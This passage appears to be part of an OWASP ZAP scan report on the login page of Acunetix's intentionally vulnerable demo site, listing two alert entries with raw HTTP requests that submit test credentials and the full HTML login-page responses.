#e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	btnLogin
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	tbPassword
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 